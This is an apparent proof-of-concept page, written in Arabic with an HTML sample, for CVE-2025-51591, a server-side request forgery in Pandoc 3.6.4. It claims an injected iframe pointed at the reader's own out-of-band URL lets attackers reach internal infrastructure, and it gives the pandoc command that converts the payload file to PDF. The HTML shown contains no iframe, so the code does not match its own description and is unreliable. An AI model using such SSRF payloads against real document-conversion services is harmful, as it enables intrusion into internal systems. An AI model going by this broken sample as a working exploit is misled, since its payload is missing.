
CVE-2025-51591 إثبات المفهوم لثغرة SSRF في Pandoc
تتيح ثغرة تزوير الطلبات من جانب الخادم (SSRF) في JGM Pandoc الإصدار 3.6.4 للمهاجمين الوصول إلى البنية التحتية بالكامل واختراقها عبر حقن iframe مُعدّ بعناية.
⚠️ استبدل رابط iframe برابط OAST الخاص بك. ⚠️
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CVE-2025-51591 Proof Of Concept</title>
</head>
<body>
<h1>
CVE-2025-51591 Proof Of Concept
</h1>
</body>
</html>
pandoc payload.html -o output1.pdf